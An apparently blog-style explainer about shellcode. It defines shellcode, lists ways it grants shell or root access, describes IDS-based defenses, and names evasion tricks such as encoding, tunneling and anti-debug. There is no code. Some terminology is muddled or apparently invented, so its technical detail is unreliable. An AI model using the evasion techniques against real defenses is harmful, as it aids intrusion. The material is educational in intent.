SHELLCODE :
Shellcode is a snippet of machine code used as a payload during the exploitation of a software bug. During the modification of a particular program’s stream or flow rate, shellcodes become the protraction of the program. Shellcodes are commonly used during the implementation of software vulnerabilities like Stack Overflows, Heap Overflows, Integer Array Overflows, File Stream Overflows and Format String Attacks.
Shellcodes are really handy during the exploitation of local application bug. Basically, it helps the attacker in getting access to the victim’s box. Accession to the system is provided by the following ways:
By spawning victim’s local shell (either /bin/sh or cmd.exe)
By binding a shell to a specific remote shell
By adding a user with root privileges to the victim’s box
DEFENSE AGAINST SHELLCODES :
To defend a particular system from the effectuation of shellcodes, vendors have initiated developed several strong defenses against shellcode. Let enlist the most common defenses adopted by the white hats to counter shellcodes:
1)Intrusion Detection Systems: Mainly three different types of Intrusion Detection System:
NIDS: Network IDS grabs network datagrams from the ongoing network traffic and analyzes attack patterns. It uses the Wire Diagnosing method. Let me elucidate this part.
Wire Diagnose scrutinizes ongoing network traffic before reaching the source destination.
It scrutinizes for known attack patterns.
Intensity of this method depends on the nature of the rules amassed by the administrator.
NIDS also utilizes method called Runtime Diagnose. A bit explanation about this method:
Assesses the output generated after the execution of a particular code.
Usually checks the output for known attack patterns.
HIDS: Host IDS analyzes attack patterns in actions committed by the local user.
AIDS: Application IDS analyzes all types of input data diffused into an application
2)Intrusion Prevention System: Sandbox
3) Different Buffer Size: Protocol enforces different buffer sizes.
4) Standard Path Transfer: Transfer of important file paths. *nix variants and BSD allows users to reorganize the system layout.
An obstruction a restriction that bars the implementation of shellcodes is the size limitation.
How Shellcodes break these defenses
Shellcodes allow the attacker to execute almost anything they wish to do. The attacker only has to concentrate on the coding part. Anyway, let enlist some steps used by attackers to counter the defenses I mentioned in the previous section:
1) Wire Diagnosing Method: This method can be easily compromised by the following techniques:
Polymorphism aka Shellcode Encoding: Masquerades the bytes by Shellcode Encoding. The encoding can later be decoded.
Tunneling through VPN/SSL: This technique makes the payload almost impossible to decode.
2) Runtime Diagnose Method: This method can be easily compromised by the following technique:
Anti-Debug: Emplaces Anti-debug tricks into the shellcode to counter debugging options.
3) Countering Size Limitations: Partitioning special operations into smaller segments that permit you to create a program channel.